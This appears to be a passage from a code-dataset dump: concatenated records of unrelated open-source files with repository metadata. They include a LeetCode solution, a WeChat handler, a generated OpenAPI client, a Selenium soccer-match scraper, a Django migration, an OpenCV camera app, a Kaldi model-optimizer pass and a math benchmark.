= 1.0, d1Amp = coin(0.75, 1, 0.5 + rnd(0.5)), d2Amp = coin(0.75, 1, 0.5 + rnd(0.5)), dry1Pan = 0.75, dry2Pan = -0.75, d1Pan = -0.75, d2Pan = 0.75) return p
[ "plewto@gmail.com" ]
plewto@gmail.com
4df5f4f912e51465974e6961e67ab1f8ec461158
d5d94c992d0596080ba694c518dfdb58d3490847
/0517/answer.py
6843c0a98adeaf6bb764fda2bb909b3cd2e7b224
[]
no_license
calgagi/leetcode
1bf24b750e44c2c893935983e5d88e0f071d9f2d
431aba979d92e331f2f92a07eb80167a823a49bd
refs/heads/master
2022-11-17T11:26:01.596496
2020-07-19T06:56:04
2020-07-19T06:56:04
276,207,528
0
0
null
null
null
null
UTF-8
Python
false
false
382
py
class Solution(object): def distributeCandies(self, candies): """ :type candies: List[int] :rtype: int """ num_candies = len(candies) sis_candies = num_candies // 2 num_types = len(list(set(candies))) if sis_candies >= num_types: return num_types else: return sis_candies
[ "calgagi@gmail.com" ]
calgagi@gmail.com
79cd9eeb476d0cee73e718951128251dd11d8676
df44affab179c2546fb3e0d1dc29eebcfdf51c1c
/toughradius/modules/mps/mps_handler.py
f405a4e7c770fd90e9e92adcaf1582a124afe6a7
[]
no_license
sailorhdx/taurusradius
121c508e7faffaddcd5326d2b6d3710eaf0ed08e
92d30820611a0c9102ae41713ea3c35437a3c6ee
refs/heads/master
2021-01-22T02:28:31.543338
2017-06-17T02:15:33
2017-06-17T02:15:33
92,362,551
0
0
null
null
null
null
UTF-8
Python
false
false
4,079
py
#!/usr/bin/env python # coding=utf-8 import cyclone.web from toughradius.toughlib import logger from toughradius.toughlib import utils from toughradius.toughlib import logger from toughradius.toughlib.permit import permit from hashlib import sha1 from cyclone.util import ObjectDict from cyclone.options import options from twisted.internet import defer from toughradius.common import wxrouter from toughradius.modules.mps.base import BaseHandler from toughradius.modules import models from wechat_sdk import WechatBasic from wechat_sdk import WechatConf import functools @permit.route('/') class HelloHandler(BaseHandler): def get(self): self.write('ok') @permit.route('/MP_verify_Z677kYAea8jAjpEn.txt') class VerifyHandler(BaseHandler): def get(self): self.write('Z677kYAea8jAjpEn') @permit.route('/mps') class IndexHandler(BaseHandler): """ 微信消息主要处理控制器 """ WechatConfCachekey = 'toughee.wechat.conf.cache' def check_xsrf_cookie(self): """ 对于微信消息不做加密cookie处理 """ pass def get_error_html(self, status_code = 500, **kwargs): """ 定制微信消息错误返回 """ self.set_header('Content-Type', 'application/xml;charset=utf-8') self.write(self.wechat.response_text(u'回复h查看帮助。')) self.finish() def check_signature(self): """ 微信消息验签处理 """ signature = self.get_argument('signature', '') timestamp = self.get_argument('timestamp', '') nonce = self.get_argument('nonce', '') return self.wechat.check_signature(signature=signature, timestamp=timestamp, nonce=nonce) def init_wechat(self): try: wechat_conf_cache = self.cache.get(self.WechatConfCachekey) if not wechat_conf_cache: token = self.get_param_value('mps_token') appid = self.get_param_value('mps_appid') appsecret = self.get_param_value('mps_apisecret') encrypt_mode = self.get_param_value('mps_encrypt_mode', 'normal') encoding_aes_key = self.get_param_value('mps_encoding_aes_key', '') wechat_conf_cache = dict(token=token, appid=appid, appsecret=appsecret, encrypt_mode=encrypt_mode, encoding_aes_key=encoding_aes_key) self.cache.set(self.WechatConfCachekey, wechat_conf_cache, expire=300) _c = wechat_conf_cache wechat_conf = WechatConf(token=_c['token'], appid=_c['appid'], appsecret=_c['appsecret'], encrypt_mode=_c['encrypt_mode'], encoding_aes_key=_c['encoding_aes_key'], access_token_getfunc=functools.partial(self.mpsapi.get_access_token, _c['appid'], _c['appsecret']), access_token_setfunc=self.mpsapi.set_access_token) self.wechat = WechatBasic(conf=wechat_conf) except Exception as err: logger.exception(err) def get(self): self.init_wechat() echostr = self.get_argument('echostr', '') if self.check_signature(): self.write(echostr) logger.info('Signature check success.') else: logger.error('Signature check failed.') @defer.inlineCallbacks def post(self): """ 微信消息处理 """ self.init_wechat() if not self.check_signature(): logger.error('Signature check failed.') return try: self.set_header('Content-Type', 'application/xml;charset=utf-8') body = self.request.body self.wechat.parse_data(body) msg = self.wechat.get_message() logger.debug(u'message type %s from %s with %s' % (self.wechat.message.type, self.wechat.message.source, body.decode('utf-8'))) response = yield wxrouter.dispatch(msg, gdata=self.application, wechat=self.wechat) logger.debug(u'Replied to %s with "%s"' % (self.wechat.message.source, response)) self.write(response) except Exception as err: logger.exception(err) self.write('error')
[ "sailorhdx@hotmail.com" ]
sailorhdx@hotmail.com
14945d7b57c4ff2d8fed1b2f4dab066b14139eba
e3040a2e23a856e319e02037dc6baf3882c796b9
/samples/openapi3/client/3_0_3_unit_test/python/unit_test_api/paths/response_body_post_nested_allof_to_check_validation_semantics_response_body_for_content_types/post.py
e29ea0fbc5326b35c7b6a6444df16c2c0b1597cf
[ "Apache-2.0" ]
permissive
mishin/openapi-generator
2ed2e0739c0cc2a627c25191d5898071d9294036
3ed650307513d552404f3d76487f3b4844acae41
refs/heads/master
2023-06-10T03:01:09.612130
2022-10-14T08:29:15
2022-10-14T08:29:15
271,080,285
0
0
Apache-2.0
2023-05-30T02:01:25
2020-06-09T18:29:41
Java
UTF-8
Python
false
false
8,103
py
# coding: utf-8 """ Generated by: https://openapi-generator.tech """ from dataclasses import dataclass import typing_extensions import urllib3 from urllib3._collections import HTTPHeaderDict from unit_test_api import api_client, exceptions from datetime import date, datetime # noqa: F401 import decimal # noqa: F401 import functools # noqa: F401 import io # noqa: F401 import re # noqa: F401 import typing # noqa: F401 import typing_extensions # noqa: F401 import uuid # noqa: F401 import frozendict # noqa: F401 from unit_test_api import schemas # noqa: F401 from unit_test_api.model.nested_allof_to_check_validation_semantics import NestedAllofToCheckValidationSemantics from . import path SchemaFor200ResponseBodyApplicationJson = NestedAllofToCheckValidationSemantics @dataclass class ApiResponseFor200(api_client.ApiResponse): response: urllib3.HTTPResponse body: typing.Union[ SchemaFor200ResponseBodyApplicationJson, ] headers: schemas.Unset = schemas.unset _response_for_200 = api_client.OpenApiResponse( response_cls=ApiResponseFor200, content={ 'application/json': api_client.MediaType( schema=SchemaFor200ResponseBodyApplicationJson), }, ) _status_code_to_response = { '200': _response_for_200, } _all_accept_content_types = ( 'application/json', ) class BaseApi(api_client.Api): @typing.overload def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: typing_extensions.Literal[False] = ..., ) -> typing.Union[ ApiResponseFor200, ]: ... @typing.overload def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, ) -> api_client.ApiResponseWithoutDeserialization: ... @typing.overload def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = ..., ) -> typing.Union[ ApiResponseFor200, api_client.ApiResponseWithoutDeserialization, ]: ... def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = False, ): """ :param skip_deserialization: If true then api_response.response will be set but api_response.body and api_response.headers will not be deserialized into schema class instances """ used_path = path.value _headers = HTTPHeaderDict() # TODO add cookie handling if accept_content_types: for accept_content_type in accept_content_types: _headers.add('Accept', accept_content_type) response = self.api_client.call_api( resource_path=used_path, method='post'.upper(), headers=_headers, stream=stream, timeout=timeout, ) if skip_deserialization: api_response = api_client.ApiResponseWithoutDeserialization(response=response) else: response_for_status = _status_code_to_response.get(str(response.status)) if response_for_status: api_response = response_for_status.deserialize(response, self.api_client.configuration) else: api_response = api_client.ApiResponseWithoutDeserialization(response=response) if not 200 <= response.status <= 299: raise exceptions.ApiException(api_response=api_response) return api_response class PostNestedAllofToCheckValidationSemanticsResponseBodyForContentTypes(BaseApi): # this class is used by api classes that refer to endpoints with operationId fn names @typing.overload def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: typing_extensions.Literal[False] = ..., ) -> typing.Union[ ApiResponseFor200, ]: ... @typing.overload def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, ) -> api_client.ApiResponseWithoutDeserialization: ... @typing.overload def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = ..., ) -> typing.Union[ ApiResponseFor200, api_client.ApiResponseWithoutDeserialization, ]: ... def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = False, ): return self._post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( accept_content_types=accept_content_types, stream=stream, timeout=timeout, skip_deserialization=skip_deserialization ) class ApiForpost(BaseApi): # this class is used by api classes that refer to endpoints by path and http method names @typing.overload def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: typing_extensions.Literal[False] = ..., ) -> typing.Union[ ApiResponseFor200, ]: ... @typing.overload def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, ) -> api_client.ApiResponseWithoutDeserialization: ... @typing.overload def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = ..., ) -> typing.Union[ ApiResponseFor200, api_client.ApiResponseWithoutDeserialization, ]: ... def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = False, ): return self._post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( accept_content_types=accept_content_types, stream=stream, timeout=timeout, skip_deserialization=skip_deserialization )
[ "noreply@github.com" ]
mishin.noreply@github.com
d0d1f9a841d791ae8e639e2c66b270b9976eaf6e
d1b3c9e1055bc759f5fba8379570ddc20cf4caa5
/main_thread.py
6ab3d3bc3e6d2ad5de46671370e69f0262faf70a
[]
no_license
woolpeeker/bet365_data
309b38245c77d9f9387c7d946dbb8410c4c84bc6
4cb920095f98faf220c74125d39ccdfe84229ee3
refs/heads/master
2020-03-29T22:48:40.234365
2018-12-14T03:41:42
2018-12-14T03:41:42
150,441,477
2
1
null
null
null
null
UTF-8
Python
false
false
4,950
py
from selenium.common.exceptions import TimeoutException from selenium import webdriver from selenium.webdriver.firefox.options import Options import datetime import time import traceback import os import multiprocessing as mp from Crawler import Crawler from utils import get_logger NT = 2 class MainThread(Crawler): def __init__(self, name='MainThead'): self.name = name self.logger=get_logger(name=self.name) super(MainThread, self).__init__(name) self.out_queue = mp.Queue(maxsize=1000) self.browserPID = mp.Value('i', 0) self.process = mp.Process(target=self.run, name=name) self.process.daemon = True self.process.start() def run(self): self.logger.info('Mainthread start') while True: try: self.work_loop() except: self.logger.error(traceback.format_exc()) finally: self._close() self.logger.info('work_loop restarting...') def work_loop(self): self._open() while True: self.logger.info('work_loop start.') if not self.click_soccer(): self.logger.info('No Soccer Section. Waiting 3 min.') time.sleep(3 * 60) continue self.wait4elem('//span[@class="ipo-TeamStack_TeamWrapper"]') teams_league = self._get_team_names() self.logger.info('Found %d match' % len(teams_league)) self.logger.info('teams_leagues:%s' % teams_league) for elem in teams_league: self.out_queue.put_nowait(elem) self.logger.info('Put elem to quenes. Sleep 3 minutes.') time.sleep(60 * 3) def _open(self): self.logger.debug('function _open') options = Options() options.headless = True self.browser = webdriver.Firefox(options=options) with self.browserPID.get_lock(): self.browserPID.value = self.browser.service.process.pid self.logger.info('browserPID=%d'%self.browserPID.value) self.browser.get('https://www.bet365.com/en') self.init_time = datetime.datetime.now() self.wait4elem('//div[@id="dBlur"][contains(@style,"hidden;")]', timeout=300) # click the welcome sports banner and inplay section entry_banner = self.browser.find_element_by_xpath('//div[@id="dv1"]') entry_banner.click() inplay_banner = self.wait4elem('//a[@class="hm-BigButton "][text()="In-Play"]', timeout=300) inplay_banner.click() self.wait4elem('//div[contains(@class,"ipo-Fixture_ScoreDisplay")]', timeout=300) def _close(self): self.logger.warning('browser close') try: self.browser.quit() except Exception as e: self.logger.error('browser close fail.') self.logger.error(traceback.format_exc()) def _get_team_names(self): # team_names is a list that each elem is a tuple represent a match # (list of team, league name) result = [] leagues = self.xpaths('//div[contains(@class,"ipo-CompetitionButton_NameLabel ")]/../..') for league in leagues: league_name=self.xpaths('.//div[contains(@class, "ipo-CompetitionButton_NameLabel")]',section=league)[0].text match_list = self.xpaths('.//div[contains(@class,"ipo-Fixture_ScoreDisplay")]',section=league) if not match_list: self.logger.warning('No match in %s' % league_name) continue for m in match_list: team_names = self.xpaths('.//span[contains(@class,"ipo-TeamStack_TeamWrapper")]', m) if not team_names: self.logger.warning('No team in %s' % league_name) continue team_names = tuple([x.text for x in team_names][:2]) result.append((team_names, league_name)) return result def click_overview(self): overview = self.wait4elem('//div[contains(@class,"ip-ControlBar_BBarItem ")]') overview.click() self.wait4elem('//div[contains(@class,"ipo-Fixture_ScoreDisplay")]') def click_soccer(self): self.logger.info('click soccer') retry_times=2 for i in range(retry_times): try: self.click_overview() soccer_button = self.wait4elem('//div[@class="ipo-ClassificationBarButtonBase_Label "][text()="Soccer"]') soccer_button.click() return True except TimeoutException as e: self.logger.warning('TimeOut: click soccer.') if i<retry_times: self.logger.warning('refresh and retry') self.browser.refresh() else: self.logger.warning('excced retry times') return False
[ "luojiapeng1993@gmail.com" ]
luojiapeng1993@gmail.com
7b6da9e011a8e2ebc5bce6257356735f68ba91dd
2a57c1a6d27304f80975bdef51ec398a690f0b2d
/lib/jubatest/__init__.py
e6af2fcc1460788bb31272b888df37d452a7422b
[]
no_license
kmaehashi/jubatest
53574b1a271731f07e98ba1c333084a653cc4044
ea5e1066bda09a8da1ad3de28ed71ad18317b6cf
refs/heads/master
2020-04-15T23:51:54.169966
2016-03-30T05:09:33
2016-03-30T05:09:33
12,368,976
1
0
null
2015-06-02T07:55:28
2013-08-26T01:39:26
Python
UTF-8
Python
false
false
165
py
# -*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals from .unit import JubaTestCase from .constants import *
[ "webmaster@kenichimaehashi.com" ]
webmaster@kenichimaehashi.com
ee9fb75785fb2393afaf072d38ab68d24b5bd23d
91283509c7cd4b309758c703303f761c6b400b53
/software/misc/get_gene_de.py
ec08fa8a00c06250a8a74335fb514bcddc9a4ece
[ "MIT" ]
permissive
Searchlight2/Searchlight2
0682c90e13e49ede961d5e43113fd7dd8728667e
f672860af3b882a06f39ada00b53da134d5a2ffa
refs/heads/master
2023-06-16T13:50:29.405772
2023-05-27T11:13:18
2023-05-27T11:13:18
223,948,179
27
13
NOASSERTION
2023-02-17T10:53:49
2019-11-25T12:52:37
Python
UTF-8
Python
false
false
171
py
def get_gene_de(global_variables,de_Dict): values_list = [de_Dict["log2fold"],de_Dict["p"],de_Dict["p.adj"],de_Dict["sig"],de_Dict["valid"]] return values_list
[ "john.cole@glasgow.ac.uk" ]
john.cole@glasgow.ac.uk
19564d429f9e45a0c1b7ce769789245222189b4c
9aa7d3c6d563a434595141f5b4dd8c54252a4d40
/tweets/migrations/0008_preference.py
b40286d91e8ba528407d73a1b8c004147d5939d4
[]
no_license
akhad97/Test-Web-App
9e200fc6d394cf6d52e72cb5f360d013e777fa9c
eb9b3480732c86f836748967bcfd6201dac6a6ee
refs/heads/master
2023-07-19T12:24:26.400998
2021-09-06T11:55:20
2021-09-06T11:55:20
402,657,324
1
0
null
null
null
null
UTF-8
Python
false
false
1,032
py
# Generated by Django 2.2.13 on 2021-07-29 18:06 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('tweets', '0007_auto_20210729_1049'), ] operations = [ migrations.CreateModel( name='Preference', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('value', models.IntegerField()), ('date', models.DateTimeField(auto_now=True)), ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tweets.Post')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'unique_together': {('user', 'post', 'value')}, }, ), ]
[ "ahadjon.abdullaev1997@gmail.com" ]
ahadjon.abdullaev1997@gmail.com
cd2559b6e2a918d2843f950eba85bcc1ee347513
9ccb49d3216fd12a79fa73d4cdc6ecf51602f286
/video/cameo.py
45826719500cd312d2708ea390c6a2530c2fa7cb
[]
no_license
shidoutsuruya/my_opencv
a12d665a2bbbc911b56b682f5c51638651354616
910748ee98271948eedcec36ee308396547f4a2e
refs/heads/master
2023-07-04T18:32:49.639714
2021-09-02T13:24:45
2021-09-02T13:24:45
402,426,956
0
1
null
null
null
null
UTF-8
Python
false
false
2,399
py
import cv2 import sys sys.path.append(r'C:\Users\max21\Desktop\Python\OpenCV\video') from managers import WindowManager,Capturemanager import filter class Cameo(object): def __init__(self): #创建一个窗口,并将键盘的回调函数传入 self._windowManager = WindowManager('Cameo', self.onKeypress) #告诉程序数据来自摄像头,还有镜面效果 self._captureManager = Capturemanager( cv2.VideoCapture(0), self._windowManager, True ) self._curveFilter=filter.BGRPortraCurveFilter()#change def run(self): '''Run the main loop''' self._windowManager.createWindow()#创建窗口,设置self._isWindowCreated = True控制循环提取摄像头信息 while self._windowManager.isWindowCreated: #这里的enterFrame作用使得从程序从摄像头中取数据 self._captureManager.enterFrame()#开启窗口 #frame是原始帧数据,未做任何改动 frame = self._captureManager.frame#获得当前帧 filter.strokeEdges(frame,frame)######change self._curveFilter.apply(frame,frame)######change #TODO: filter the frame(Chapter 3) #exitFrame()主要功能:实现截屏,录屏 self._captureManager.exitFrame()#根据控制参数,选择是否进行截屏和录屏,并将self._frame等参数还原准备下一次循环 #回调函数 self._windowManager.processEvent() def onKeypress(self, keycode): '''Handle a keypress space -> Take a screenshot tab -> State/stop recording a screencast escape -> Quit ''' if keycode == 32: #Space #截取保存的文件名称 self._captureManager.WriteImage(r'C:\Users\max21\Desktop\screenshot.png')#设置截取图片保存信息 elif keycode == 9:#tab if not self._captureManager.isWritingVideo:#判断为开始录制视频或结束录制视频 #录像保存的文件名字 self._captureManager.startWritingVideo( r'C:\Users\max21\Desktop\screencast.avi' ) else: self._captureManager.stopWritingVideo() elif keycode == 27: #escape self._windowManager.destroyWindow() if __name__ == '__main__': Cameo().run()
[ "shidoutsuruya@gmail.com" ]
shidoutsuruya@gmail.com
77cc550ae737bb0ee04e2770fd25d189cae5cd7d
99b84337ae66ad2877544fd158f20e7f4cd96520
/day01-10/day03/07-if语句.py
12ece94197133e1b68e793b0fca8e9db9d46452a
[]
no_license
jiajiabin/python_study
cf145d54cabce2cb98914b3448ed7d0e5c1c146c
b4faaff26ee9728af2e80942ba6a7c7f6a8b0f86
refs/heads/master
2020-06-21T21:31:26.034978
2019-08-26T11:39:34
2019-08-26T11:39:34
197,556,254
2
0
null
null
null
null
UTF-8
Python
false
false
211
py
# if语句 print('line01') if 5 < 3: print("Good!") # python比其他语言更重视缩进 print("Good day!") if 5 + 3: print("Excellent!!") if 5 * 0: print("Not bad!!") print('line02')
[ "2592668397@qq.com" ]
2592668397@qq.com
987daffedbfae7ec715410bded64b9b080d0592d
19c87c46013ce41abbec7db48ae9cc3e6d015269
/lib/node_modules/@stdlib/math/base/special/atan/benchmark/python/benchmark.py
5c9898b5907409301c61bb752c405b40492d5bc1
[ "BSD-3-Clause", "BSL-1.0", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
rreusser/stdlib
834428bcfcc76202e8d6a241b6d0aa6446f0da72
ca98ecb7e3736c290e32595f8cb57a98cf7ef509
refs/heads/develop
2021-01-20T13:26:42.198550
2017-05-06T19:44:19
2017-05-06T19:44:19
90,491,573
0
0
null
2017-05-06T21:15:05
2017-05-06T21:15:05
null
UTF-8
Python
false
false
1,516
py
#!/usr/bin/env python """Benchmark atan.""" import timeit name = "atan" repeats = 3 iterations = 1000000 def print_version(): """Print the TAP version.""" print("TAP version 13") def print_summary(total, passing): """Print the benchmark summary. # Arguments * `total`: total number of tests * `passing`: number of passing tests """ print("#") print("1.." + str(total)) # TAP plan print("# total " + str(total)) print("# pass " + str(passing)) print("#") print("# ok") def print_results(elapsed): """Print benchmark results. # Arguments * `elapsed`: elapsed time (in seconds) # Examples ``` python python> print_results(0.131009101868) ``` """ rate = iterations / elapsed print(" ---") print(" iterations: " + str(iterations)) print(" elapsed: " + str(elapsed)) print(" rate: " + str(rate)) print(" ...") def benchmark(): """Run the benchmark and print benchmark results.""" setup = "from math import atan; from random import random;" stmt = "y = atan(10000.0*random() - 0.0)" t = timeit.Timer(stmt, setup=setup) print_version() for i in xrange(3): print("# python::" + name) elapsed = t.timeit(number=iterations) print_results(elapsed) print("ok " + str(i+1) + " benchmark finished") print_summary(repeats, repeats) def main(): """Run the benchmark.""" benchmark() if __name__ == "__main__": main()
[ "kgryte@gmail.com" ]
kgryte@gmail.com
9de0ceb6297499202c5213b01406fa2c200f205e
80db1d25ed31c1a7b45653775517b9eff22dd67b
/vcoasm/compilables.py
a2d947551ea19b6f6988c8941f2a7334eaee7fa8
[ "MIT" ]
permissive
vcokltfre/vcoasm
e45fb4d31a0ac6e054cc75cc4fe1ef41e9ab4990
cb660465d78bf6b479ba7f6a38bae9385a67b6c0
refs/heads/master
2023-05-29T02:07:07.861324
2021-06-17T10:11:27
2021-06-17T10:11:27
377,801,143
0
0
null
null
null
null
UTF-8
Python
false
false
1,246
py
from abc import ABC, abstractmethod class Compilable(ABC): def __init__(self, value) -> None: self.value = value def __repr__(self) -> str: return f"<{self.__class__.__qualname__} value={self.value}>" def __str__(self) -> str: return self.__repr__() @abstractmethod def compile(self) -> bytearray: ... class Raw(Compilable): def compile(self) -> bytearray: return bytearray([self.value]) class Integer(Compilable): def compile(self) -> bytearray: b = bytearray([0xF0]) b.extend(self.value.to_bytes(8, "big")) return b class String(Compilable): def compile(self) -> bytearray: b = bytearray([0xF1]) b.extend(Integer(len(self.value)).compile()) b.extend([ord(c) for c in self.value]) return b class DebugInfo(Compilable): def __init__(self, file: str, line: int) -> None: self.value = f"{line}@{file}" def compile(self) -> bytearray: b = bytearray([0xFF]) b.extend(String(self.value).compile()) return b class Identifier(Compilable): def compile(self) -> bytearray: b = bytearray([0xF4]) b.extend(String(self.value).compile()) return b
[ "vcokltfre@gmail.com" ]
vcokltfre@gmail.com
145dc99e4e6ead5edb4254afe7e15b60d4ae21ef
088e000eb5f16e6d0d56c19833b37de4e67d1097
/model-optimizer/extensions/front/kaldi/replace_lstm_nonlinearity.py
f50def886315e73b6d88ba0cc490d3cb0843896b
[ "Apache-2.0" ]
permissive
projectceladon/dldt
614ba719a428cbb46d64ab8d1e845ac25e85a53e
ba6e22b1b5ee4cbefcc30e8d9493cddb0bb3dfdf
refs/heads/2019
2022-11-24T10:22:34.693033
2019-08-09T16:02:42
2019-08-09T16:02:42
204,383,002
1
1
Apache-2.0
2022-11-22T04:06:09
2019-08-26T02:48:52
C++
UTF-8
Python
false
false
5,493
py
""" Copyright (c) 2019 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from extensions.ops.activation_ops import Sigmoid, Tanh from mo.front.caffe.extractors.utils import embed_input from mo.front.common.replacement import FrontReplacementOp from mo.graph.graph import Node, Graph from mo.ops.concat import Concat from mo.ops.eltwise import Eltwise from mo.ops.scale_shift import ScaleShiftOp from mo.ops.split import Split class ReplaceLstmNonLinearityPattern(FrontReplacementOp): op = "LstmNonLinearity" enabled = True def run_after(self): from extensions.front.restore_ports import RestorePorts return [RestorePorts] def replace_op(self, graph: Graph, node: Node): # split input to (i_part, f_part, c_part, o_part, ct_1) split_node = Split(graph, {'name': graph.unique_id(prefix='Split_lstm_input_'), 'num_split': 5}).create_node() node.in_port(0).get_connection().set_destination(split_node.in_port(0)) for i in range(5): split_node.add_output_port(i) # i_t = Sigmoid(i_part + w_ic*ct_1) i_scale_attrs = {'name': graph.unique_id(prefix='i_scaleshift'), 'bias_term': False} embed_input(i_scale_attrs, 1, 'weights', node.i_weights) i_scale = ScaleShiftOp(graph, i_scale_attrs).create_node() split_node.out_port(4).connect(i_scale.in_port(0)) sum_i_c = Eltwise(graph, {'name': graph.unique_id(prefix='sum_i_c_'), 'operation': 'sum'}).create_node() split_node.out_port(0).connect(sum_i_c.in_port(0)) i_scale.out_port(0).connect(sum_i_c.in_port(1)) i_sigmoid = Sigmoid(graph, {'name': 'i_sigmoid'}).create_node() sum_i_c.out_port(0).connect(i_sigmoid.in_port(0)) # f_t = Sigmoid(f_part + w_fc*ct_1) f_scale_attrs = {'name': graph.unique_id(prefix='f_scaleshift'), 'bias_term': False} embed_input(f_scale_attrs, 1, 'weights', node.f_weights) f_scale = ScaleShiftOp(graph, f_scale_attrs).create_node() split_node.out_port(4).connect(f_scale.in_port(0)) sum_f_c = Eltwise(graph, {'name': graph.unique_id(prefix='sum_f_c_'), 'operation': 'sum'}).create_node() split_node.out_port(1).connect(sum_f_c.in_port(0)) f_scale.out_port(0).connect(sum_f_c.in_port(1)) f_sigmoid = Sigmoid(graph, {'name': 'f_sigmoid'}).create_node() sum_f_c.out_port(0).connect(f_sigmoid.in_port(0)) # c_t = f_t*ct_1 + i_t * tanh(c_part) c_tanh = Tanh(graph, {'name': 'c_tanh'}).create_node() split_node.out_port(2).connect(c_tanh.in_port(0)) prod_i_c_tanh = Eltwise(graph, {'name': graph.unique_id(prefix='prod_i_c_tanh_'), 'operation': 'mul'}).create_node() i_sigmoid.out_port(0).connect(prod_i_c_tanh.in_port(0)) c_tanh.out_port(0).connect(prod_i_c_tanh.in_port(1)) prod_f_ct_1 = Eltwise(graph, {'name': graph.unique_id(prefix='prod_f_ct_1_'), 'operation': 'mul'}).create_node() f_sigmoid.out_port(0).connect(prod_f_ct_1.in_port(0)) split_node.out_port(4).connect(prod_f_ct_1.in_port(1)) sum_f_i = Eltwise(graph, {'name': graph.unique_id(prefix='sum_f_i_'), 'operation': 'sum'}).create_node() prod_f_ct_1.out_port(0).connect(sum_f_i.in_port(0)) prod_i_c_tanh.out_port(0).connect(sum_f_i.in_port(1)) # o_t = Sigmoid(o_part + w_oc*c_t) o_scale_attrs = {'name': graph.unique_id(prefix='o_scaleshift'), 'bias_term': False} embed_input(o_scale_attrs, 1, 'weights', node.o_weights) o_scale = ScaleShiftOp(graph, o_scale_attrs).create_node() sum_f_i.out_port(0).connect(o_scale.in_port(0)) sum_o_c = Eltwise(graph, {'name': graph.unique_id(prefix='sum_o_c_'), 'operation': 'sum'}).create_node() split_node.out_port(3).connect(sum_o_c.in_port(0)) o_scale.out_port(0).connect(sum_o_c.in_port(1)) o_sigmoid = Sigmoid(graph, {'name': 'o_sigmoid'}).create_node() sum_o_c.out_port(0).connect(o_sigmoid.in_port(0)) # m_t = o_t * Tanh(c_t) c_t_tanh = Tanh(graph, {'name': 'c_t_tanh'}).create_node() sum_f_i.out_port(0).connect(c_t_tanh.in_port(0)) prod_o_c_t_tanh = Eltwise(graph, {'name': graph.unique_id(prefix='prod_o_c_t_tanh_'), 'operation': 'mul'}).create_node() o_sigmoid.out_port(0).connect(prod_o_c_t_tanh.in_port(0)) c_t_tanh.out_port(0).connect(prod_o_c_t_tanh.in_port(1)) # add concat to create 1 output concat = Concat(graph, {'name': graph.unique_id(prefix='Concat_c_m')}).create_node() concat.add_sequence_of_ports('in', range(2)) sum_f_i.out_port(0).connect(concat.in_port(0)) prod_o_c_t_tanh.out_port(0).connect(concat.in_port(1)) return [concat.id]
[ "44090433+openvino-pushbot@users.noreply.github.com" ]
44090433+openvino-pushbot@users.noreply.github.com
bc31f0d3373dece3426e10a21d2ea098049e4f14
c9fb37a97abe7767e45e2d95694002aa334da6a1
/kodetest/__init__.py
cefda69719b8c2e0658c4bbc64e84368abc0119b
[ "MIT" ]
permissive
arve0/kodetest
6c3ce09e3afbb29e54bac4d9bbc7c0963bd13dd5
93a6c5ca4d50c5574f0d3bda94c7aba9da38430a
refs/heads/master
2021-01-21T10:09:22.152122
2015-06-10T10:23:24
2015-06-10T10:23:24
37,190,492
0
0
null
null
null
null
UTF-8
Python
false
false
169
py
__author__ = 'Arve Seljebu' __email__ = 'arve.seljebu@gmail.com' from os.path import join, dirname __version__ = open(join(dirname(__file__), 'VERSION')).read().strip()
[ "arve.seljebu@gmail.com" ]
arve.seljebu@gmail.com
c37555e64f17e0c4712b0d716cd059dc7849bdf4
b7125b27e564d2cc80a2ce8d0a6f934aa22c8445
